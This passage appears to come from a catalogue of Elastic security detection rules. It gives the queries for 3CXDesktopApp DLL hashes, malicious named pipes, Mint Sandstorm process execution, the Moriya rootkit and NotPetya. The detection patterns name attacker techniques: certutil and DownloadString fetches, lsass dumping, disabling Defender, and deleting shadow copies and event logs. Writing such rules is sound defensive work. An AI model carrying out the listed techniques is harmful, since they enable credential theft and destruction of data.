"*SHA1=3B3E778B647371262120A523EB873C20BB82BEAF*" or Hashes like "*MD5=7FAEA2B01796B80D180399040BB69835*"
Elastic Converted Lucene critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp.
Hashes:(*SHA256\=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896* OR *SHA1\=BF939C9C261D27EE7BB92325CC588624FCA75429* OR *MD5\=74BC2D0B6680FAA1A5A76B27E5479CBC* OR *SHA256\=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03* OR *SHA1\=20D554A80D759C50D6537DD7097FED84DD258B3E* OR *MD5\=82187AD3F0C6C225E2FBA0C867280CC9* OR *SHA256\=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952* OR *SHA1\=894E7D4FFD764BB458809C7F0643694B036EAD30* OR *MD5\=11BC82A9BD8297BD0823BCE5D6202082* OR *SHA256\=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423* OR *SHA1\=3B3E778B647371262120A523EB873C20BB82BEAF* OR *MD5\=7FAEA2B01796B80D180399040BB69835*)
Elastic Converted EQL critical T1055 ↗
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
any where PipeName like~ ("\\46a676ab7f179e511e30dd2dc41bd388", "\\583da945-62af-10e8-4902-a8f205c72b2e", "\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7", "\\9f81f59bc58452127884ce513865ed20", "\\adschemerpc", "\\ahexec", "\\AnonymousPipe", "\\bc31a7", "\\bc367", "\\bizkaz", "\\csexecsvc", "\\dce_3d", "\\e710f28d59aa529d6792ca6ff0ca1b34", "\\gruntsvc", "\\isapi_dg", "\\isapi_dg2", "\\isapi_http", "\\jaccdpqnvbrrxlaf", "\\lsassw", "\\NamePipe_MoreWindows", "\\pcheap_reuse", "\\Posh*", "\\rpchlp_3", "\\sdlrpc", "\\svcctl", "\\testPipe", "\\winsession")
Elastic Converted ES|QL critical T1055 ↗
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
from * metadata _id, _index, _version | where PipeName=="\\46a676ab7f179e511e30dd2dc41bd388" or PipeName=="\\583da945-62af-10e8-4902-a8f205c72b2e" or PipeName=="\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7" or PipeName=="\\9f81f59bc58452127884ce513865ed20" or PipeName=="\\adschemerpc" or PipeName=="\\ahexec" or PipeName=="\\AnonymousPipe" or PipeName=="\\bc31a7" or PipeName=="\\bc367" or PipeName=="\\bizkaz" or PipeName=="\\csexecsvc" or PipeName=="\\dce_3d" or PipeName=="\\e710f28d59aa529d6792ca6ff0ca1b34" or PipeName=="\\gruntsvc" or PipeName=="\\isapi_dg" or PipeName=="\\isapi_dg2" or PipeName=="\\isapi_http" or PipeName=="\\jaccdpqnvbrrxlaf" or PipeName=="\\lsassw" or PipeName=="\\NamePipe_MoreWindows" or PipeName=="\\pcheap_reuse" or starts_with(PipeName, "\\Posh") or PipeName=="\\rpchlp_3" or PipeName=="\\sdlrpc" or PipeName=="\\svcctl" or PipeName=="\\testPipe" or PipeName=="\\winsession"
Elastic Converted Lucene critical T1055 ↗
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
PipeName:(\\46a676ab7f179e511e30dd2dc41bd388 OR \\583da945\-62af\-10e8\-4902\-a8f205c72b2e OR \\6e7645c4\-32c5\-4fe3\-aabf\-e94c2f4370e7 OR \\9f81f59bc58452127884ce513865ed20 OR \\adschemerpc OR \\ahexec OR \\AnonymousPipe OR \\bc31a7 OR \\bc367 OR \\bizkaz OR \\csexecsvc OR \\dce_3d OR \\e710f28d59aa529d6792ca6ff0ca1b34 OR \\gruntsvc OR \\isapi_dg OR \\isapi_dg2 OR \\isapi_http OR \\jaccdpqnvbrrxlaf OR \\lsassw OR \\NamePipe_MoreWindows OR \\pcheap_reuse OR \\Posh* OR \\rpchlp_3 OR \\sdlrpc OR \\svcctl OR \\testPipe OR \\winsession)
Elastic Original EQL critical T1210 ↗
Malicious Remote File Creation
Malicious remote file creation, which can be an indicator of lateral movement activity.
Elastic Original KQL critical
Malware - Detected - Elastic Endgame
Elastic Endgame detected Malware. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.
Elastic Converted EQL critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious process execution spawned from AsperaFaspex, as seen used by Mint Sandstorm.
any where (ParentImage:"*aspera*" and ParentImage:"*\\ruby*") and (((Image like~ ("*\\powershell.exe", "*\\powershell_ise.exe")) and ((CommandLine like~ ("* echo *", "*-dumpmode*", "*-ssh*", "*.dmp*", "*add-MpPreference*", "*adscredentials*", "*bitsadmin*", "*certutil*", "*csvhost.exe*", "*DownloadFile*", "*DownloadString*", "*dsquery*", "*ekern.exe*", "*FromBase64String*", "*iex *", "*iex(*", "*Invoke-Expression*", "*Invoke-WebRequest*", "*localgroup administrators*", "*o365accountconfiguration*", "*samaccountname=*", "*set-MpPreference*", "*svhost.exe*", "*System.IO.Compression*", "*System.IO.MemoryStream*", "*usoprivate*", "*usoshared*", "*whoami*")) or (CommandLine regex~ "[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}" or CommandLine regex~ "net\s+user" or CommandLine regex~ "net\s+group" or CommandLine regex~ "query\s+session"))) or (CommandLine:"*lsass*" and (CommandLine like~ ("*procdump*", "*tasklist*", "*findstr*"))) or ((Image:"*\\wget.exe" and CommandLine:"*http*") or (Image:"*\\curl.exe" and CommandLine:"*http*") or (CommandLine like~ ("*E:jscript*", "*e:vbscript*")) or (CommandLine:"*localgroup Administrators*" and CommandLine:"*/add*") or (CommandLine:"*net*" and (CommandLine:"*user*" and CommandLine:"*/add*")) or ((CommandLine:"*reg add*" and CommandLine:"*DisableAntiSpyware*" and CommandLine:"*\\Microsoft\\Windows Defender*") or (CommandLine:"*reg add*" and CommandLine:"*DisableRestrictedAdmin*" and CommandLine:"*CurrentControlSet\\Control\\Lsa*")) or (CommandLine:"*wmic*" and CommandLine:"*process call create*") or (CommandLine:"*wmic*" and CommandLine:"*delete*" and CommandLine:"*shadowcopy*") or (CommandLine:"*vssadmin*" and CommandLine:"*delete*" and CommandLine:"*shadows*") or (CommandLine:"*wbadmin*" and CommandLine:"*delete*" and CommandLine:"*catalog*")))
Elastic Converted ES|QL critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious process execution spawned from AsperaFaspex, as seen used by Mint Sandstorm.
from * metadata _id, _index, _version | where ParentImage like "*aspera*" and ParentImage like "*\\ruby*" and ((ends_with(Image, "\\powershell.exe") or ends_with(Image, "\\powershell_ise.exe")) and (CommandLine like "* echo *" or CommandLine like "*-dumpmode*" or CommandLine like "*-ssh*" or CommandLine like "*.dmp*" or CommandLine like "*add-MpPreference*" or CommandLine like "*adscredentials*" or CommandLine like "*bitsadmin*" or CommandLine like "*certutil*" or CommandLine like "*csvhost.exe*" or CommandLine like "*DownloadFile*" or CommandLine like "*DownloadString*" or CommandLine like "*dsquery*" or CommandLine like "*ekern.exe*" or CommandLine like "*FromBase64String*" or CommandLine like "*iex *" or CommandLine like "*iex(*" or CommandLine like "*Invoke-Expression*" or CommandLine like "*Invoke-WebRequest*" or CommandLine like "*localgroup administrators*" or CommandLine like "*o365accountconfiguration*" or CommandLine like "*samaccountname=*" or CommandLine like "*set-MpPreference*" or CommandLine like "*svhost.exe*" or CommandLine like "*System.IO.Compression*" or CommandLine like "*System.IO.MemoryStream*" or CommandLine like "*usoprivate*" or CommandLine like "*usoshared*" or CommandLine like "*whoami*" or CommandLine rlike "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or CommandLine rlike "net\\s+user" or CommandLine rlike "net\\s+group" or CommandLine rlike "query\\s+session") or CommandLine like "*lsass*" and (CommandLine like "*procdump*" or CommandLine like "*tasklist*" or CommandLine like "*findstr*") or ends_with(Image, "\\wget.exe") and CommandLine like "*http*" or ends_with(Image, "\\curl.exe") and CommandLine like "*http*" or CommandLine like "*E:jscript*" or CommandLine like "*e:vbscript*" or CommandLine like "*localgroup Administrators*" and CommandLine like "*/add*" or CommandLine like "*net*" and CommandLine like "*user*" and CommandLine like "*/add*" or CommandLine like "*reg add*" and CommandLine like "*DisableAntiSpyware*" and CommandLine like "*\\Microsoft\\Windows Defender*" or CommandLine like "*reg add*" and CommandLine like "*DisableRestrictedAdmin*" and CommandLine like "*CurrentControlSet\\Control\\Lsa*" or CommandLine like "*wmic*" and CommandLine like "*process call create*" or CommandLine like "*wmic*" and CommandLine like "*delete*" and CommandLine like "*shadowcopy*" or CommandLine like "*vssadmin*" and CommandLine like "*delete*" and CommandLine like "*shadows*" or CommandLine like "*wbadmin*" and CommandLine like "*delete*" and CommandLine like "*catalog*")
Elastic Converted Lucene critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
(ParentImage:*aspera* AND ParentImage:*\\ruby*) AND (((Image:(*\\powershell.exe OR *\\powershell_ise.exe)) AND ((CommandLine:(*\ echo\ * OR *\-dumpmode* OR *\-ssh* OR *.dmp* OR *add\-MpPreference* OR *adscredentials* OR *bitsadmin* OR *certutil* OR *csvhost.exe* OR *DownloadFile* OR *DownloadString* OR *dsquery* OR *ekern.exe* OR *FromBase64String* OR *iex\ * OR *iex\(* OR *Invoke\-Expression* OR *Invoke\-WebRequest* OR *localgroup\ administrators* OR *o365accountconfiguration* OR *samaccountname\=* OR *set\-MpPreference* OR *svhost.exe* OR *System.IO.Compression* OR *System.IO.MemoryStream* OR *usoprivate* OR *usoshared* OR *whoami*)) OR (CommandLine:/[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}/ OR CommandLine:/net\s+user/ OR CommandLine:/net\s+group/ OR CommandLine:/query\s+session/))) OR (CommandLine:*lsass* AND (CommandLine:(*procdump* OR *tasklist* OR *findstr*))) OR ((Image:*\\wget.exe AND CommandLine:*http*) OR (Image:*\\curl.exe AND CommandLine:*http*) OR (CommandLine:(*E\:jscript* OR *e\:vbscript*)) OR (CommandLine:*localgroup\ Administrators* AND CommandLine:*\/add*) OR (CommandLine:*net* AND (CommandLine:*user* AND CommandLine:*\/add*)) OR ((CommandLine:*reg\ add* AND CommandLine:*DisableAntiSpyware* AND CommandLine:*\\Microsoft\\Windows\ Defender*) OR (CommandLine:*reg\ add* AND CommandLine:*DisableRestrictedAdmin* AND CommandLine:*CurrentControlSet\\Control\\Lsa*)) OR (CommandLine:*wmic* AND CommandLine:*process\ call\ create*) OR (CommandLine:*wmic* AND CommandLine:*delete* AND CommandLine:*shadowcopy*) OR (CommandLine:*vssadmin* AND CommandLine:*delete* AND CommandLine:*shadows*) OR (CommandLine:*wbadmin* AND CommandLine:*delete* AND CommandLine:*catalog*)))
Elastic Converted EQL critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
any where ((ParentImage like~ ("*manageengine*", "*ServiceDesk*")) and ParentImage:"*\\java*") and (((Image like~ ("*\\powershell.exe", "*\\powershell_ise.exe")) and ((CommandLine like~ ("* echo *", "*-dumpmode*", "*-ssh*", "*.dmp*", "*add-MpPreference*", "*adscredentials*", "*bitsadmin*", "*certutil*", "*csvhost.exe*", "*DownloadFile*", "*DownloadString*", "*dsquery*", "*ekern.exe*", "*FromBase64String*", "*iex *", "*iex(*", "*Invoke-Expression*", "*Invoke-WebRequest*", "*localgroup administrators*", "*o365accountconfiguration*", "*samaccountname=*", "*set-MpPreference*", "*svhost.exe*", "*System.IO.Compression*", "*System.IO.MemoryStream*", "*usoprivate*", "*usoshared*", "*whoami*")) or CommandLine regex~ "[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}" or CommandLine regex~ "net\s+user" or CommandLine regex~ "net\s+group" or CommandLine regex~ "query\ssession")) or (CommandLine:"*lsass*" and (CommandLine like~ ("*procdump*", "*tasklist*", "*findstr*"))) or ((Image:"*\\wget.exe" and CommandLine:"*http*") or (Image:"*\\curl.exe" and CommandLine:"*http*") or (CommandLine like~ ("*E:jscript*", "*e:vbscript*")) or (CommandLine:"*localgroup Administrators*" and CommandLine:"*/add*") or (CommandLine:"*net*" and (CommandLine:"*user*" and CommandLine:"*/add*")) or ((CommandLine:"*reg add*" and CommandLine:"*DisableAntiSpyware*" and CommandLine:"*\\Microsoft\\Windows Defender*") or (CommandLine:"*reg add*" and CommandLine:"*DisableRestrictedAdmin*" and CommandLine:"*CurrentControlSet\\Control\\Lsa*")) or (CommandLine:"*wmic*" and CommandLine:"*process call create*") or (CommandLine:"*wmic*" and CommandLine:"*delete*" and CommandLine:"*shadowcopy*") or (CommandLine:"*vssadmin*" and CommandLine:"*delete*" and CommandLine:"*shadows*") or (CommandLine:"*wbadmin*" and CommandLine:"*delete*" and CommandLine:"*catalog*"))) and (not (CommandLine:"*download.microsoft.com*" and CommandLine:"*manageengine.com*" and CommandLine:"*msiexec*"))
Elastic Converted ES|QL critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
from * metadata _id, _index, _version | where (ParentImage like "*manageengine*" or ParentImage like "*ServiceDesk*") and ParentImage like "*\\java*" and ((ends_with(Image, "\\powershell.exe") or ends_with(Image, "\\powershell_ise.exe")) and (CommandLine like "* echo *" or CommandLine like "*-dumpmode*" or CommandLine like "*-ssh*" or CommandLine like "*.dmp*" or CommandLine like "*add-MpPreference*" or CommandLine like "*adscredentials*" or CommandLine like "*bitsadmin*" or CommandLine like "*certutil*" or CommandLine like "*csvhost.exe*" or CommandLine like "*DownloadFile*" or CommandLine like "*DownloadString*" or CommandLine like "*dsquery*" or CommandLine like "*ekern.exe*" or CommandLine like "*FromBase64String*" or CommandLine like "*iex *" or CommandLine like "*iex(*" or CommandLine like "*Invoke-Expression*" or CommandLine like "*Invoke-WebRequest*" or CommandLine like "*localgroup administrators*" or CommandLine like "*o365accountconfiguration*" or CommandLine like "*samaccountname=*" or CommandLine like "*set-MpPreference*" or CommandLine like "*svhost.exe*" or CommandLine like "*System.IO.Compression*" or CommandLine like "*System.IO.MemoryStream*" or CommandLine like "*usoprivate*" or CommandLine like "*usoshared*" or CommandLine like "*whoami*" or CommandLine rlike "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or CommandLine rlike "net\\s+user" or CommandLine rlike "net\\s+group" or CommandLine rlike "query\\ssession") or CommandLine like "*lsass*" and (CommandLine like "*procdump*" or CommandLine like "*tasklist*" or CommandLine like "*findstr*") or ends_with(Image, "\\wget.exe") and CommandLine like "*http*" or ends_with(Image, "\\curl.exe") and CommandLine like "*http*" or CommandLine like "*E:jscript*" or CommandLine like "*e:vbscript*" or CommandLine like "*localgroup Administrators*" and CommandLine like "*/add*" or CommandLine like "*net*" and CommandLine like "*user*" and CommandLine like "*/add*" or CommandLine like "*reg add*" and CommandLine like "*DisableAntiSpyware*" and CommandLine like "*\\Microsoft\\Windows Defender*" or CommandLine like "*reg add*" and CommandLine like "*DisableRestrictedAdmin*" and CommandLine like "*CurrentControlSet\\Control\\Lsa*" or CommandLine like "*wmic*" and CommandLine like "*process call create*" or CommandLine like "*wmic*" and CommandLine like "*delete*" and CommandLine like "*shadowcopy*" or CommandLine like "*vssadmin*" and CommandLine like "*delete*" and CommandLine like "*shadows*" or CommandLine like "*wbadmin*" and CommandLine like "*delete*" and CommandLine like "*catalog*") and not (CommandLine like "*download.microsoft.com*" and CommandLine like "*manageengine.com*" and CommandLine like "*msiexec*")
Elastic Converted Lucene critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
((ParentImage:(*manageengine* OR *ServiceDesk*)) AND ParentImage:*\\java*) AND (((Image:(*\\powershell.exe OR *\\powershell_ise.exe)) AND ((CommandLine:(*\ echo\ * OR *\-dumpmode* OR *\-ssh* OR *.dmp* OR *add\-MpPreference* OR *adscredentials* OR *bitsadmin* OR *certutil* OR *csvhost.exe* OR *DownloadFile* OR *DownloadString* OR *dsquery* OR *ekern.exe* OR *FromBase64String* OR *iex\ * OR *iex\(* OR *Invoke\-Expression* OR *Invoke\-WebRequest* OR *localgroup\ administrators* OR *o365accountconfiguration* OR *samaccountname\=* OR *set\-MpPreference* OR *svhost.exe* OR *System.IO.Compression* OR *System.IO.MemoryStream* OR *usoprivate* OR *usoshared* OR *whoami*)) OR CommandLine:/[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}/ OR CommandLine:/net\s+user/ OR CommandLine:/net\s+group/ OR CommandLine:/query\ssession/)) OR (CommandLine:*lsass* AND (CommandLine:(*procdump* OR *tasklist* OR *findstr*))) OR ((Image:*\\wget.exe AND CommandLine:*http*) OR (Image:*\\curl.exe AND CommandLine:*http*) OR (CommandLine:(*E\:jscript* OR *e\:vbscript*)) OR (CommandLine:*localgroup\ Administrators* AND CommandLine:*\/add*) OR (CommandLine:*net* AND (CommandLine:*user* AND CommandLine:*\/add*)) OR ((CommandLine:*reg\ add* AND CommandLine:*DisableAntiSpyware* AND CommandLine:*\\Microsoft\\Windows\ Defender*) OR (CommandLine:*reg\ add* AND CommandLine:*DisableRestrictedAdmin* AND CommandLine:*CurrentControlSet\\Control\\Lsa*)) OR (CommandLine:*wmic* AND CommandLine:*process\ call\ create*) OR (CommandLine:*wmic* AND CommandLine:*delete* AND CommandLine:*shadowcopy*) OR (CommandLine:*vssadmin* AND CommandLine:*delete* AND CommandLine:*shadows*) OR (CommandLine:*wbadmin* AND CommandLine:*delete* AND CommandLine:*catalog*))) AND (NOT (CommandLine:*download.microsoft.com* AND CommandLine:*manageengine.com* AND CommandLine:*msiexec*))
Elastic Converted EQL critical T1543.003 ↗
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
any where Provider_Name:"Service Control Manager" and EventID:7045 and ServiceName:"ZzNetSvc"
Elastic Converted ES|QL critical T1543.003 ↗
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
from * metadata _id, _index, _version | where Provider_Name=="Service Control Manager" and EventID==7045 and ServiceName=="ZzNetSvc"
Elastic Converted Lucene critical T1543.003 ↗
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
Provider_Name:Service\ Control\ Manager AND EventID:7045 AND ServiceName:ZzNetSvc
Elastic Converted EQL critical T1543.003 ↗
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
any where TargetFilename:"C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
Elastic Converted ES|QL critical T1543.003 ↗
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
from * metadata _id, _index, _version | where TargetFilename=="C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
Elastic Converted Lucene critical T1543.003 ↗
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
TargetFilename:C\:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys
Elastic Original ESQL critical
Multiple Alerts on a Host Exhibiting CPU Spike
This rule correlates multiple security alerts from a host exhibiting unusually high CPU utilization within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise.
Elastic Original ESQL critical
Multiple Rare Elastic Defend Behavior Rules by Host
Identifies hosts that triggered multiple distinct Elastic Defend behavior rules, while reducing false positives by considering only behavior rules that appear on a single host globally (via INLINE STATS). Hosts with two or more such rare behavior rules are more likely to be compromised and warrant prioritized triage.
Elastic Original ESQL critical
Multiple Vulnerabilities by Asset via Wiz
This alert identifies assets with an elevated number of vulnerabilities reported by Wiz, potentially indicating weak security posture, missed patching, or active exposure. The rule highlights assets with a high volume of distinct vulnerabilities, the presence of exploitable vulnerabilities, or a combination of multiple severities, helping prioritize assets that pose increased risk.
Elastic Original ESQL critical
Newly Observed FortiGate Alert
This rule detects FortiGate alerts that are observed for the first time in the previous 5 days of alert history. Analysts can use this to prioritize triage and response.
Elastic Original ESQL critical
Newly Observed High Severity Suricata Alert
This rule detects Suricata high severity alerts that are observed for the first time in the previous 5 days of alert history. Analysts can use this to prioritize triage and response.
Elastic Original ESQL critical
Newly Observed Palo Alto Network Alert
This rule detects Palo Alto Network alerts that are observed for the first time in the previous 5 days of alert history. Analysts can use this to prioritize triage and response.
Elastic Converted EQL critical T1003.001 ↗
NotPetya Ransomware Activity
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via a named pipe, the file system journal of drive C is deleted, and Windows event logs are cleared using wevtutil.
any where (CommandLine like~ ("*wevtutil cl Application & fsutil usn deletejournal /D C:*", "*dllhost.dat %WINDIR%\\ransoms*")) or (Image:"*\\rundll32.exe" and (CommandLine like~ ("*.dat,#1", "*.dat #1", "*.zip.dll\",#1"))) or "\\perfc.dat"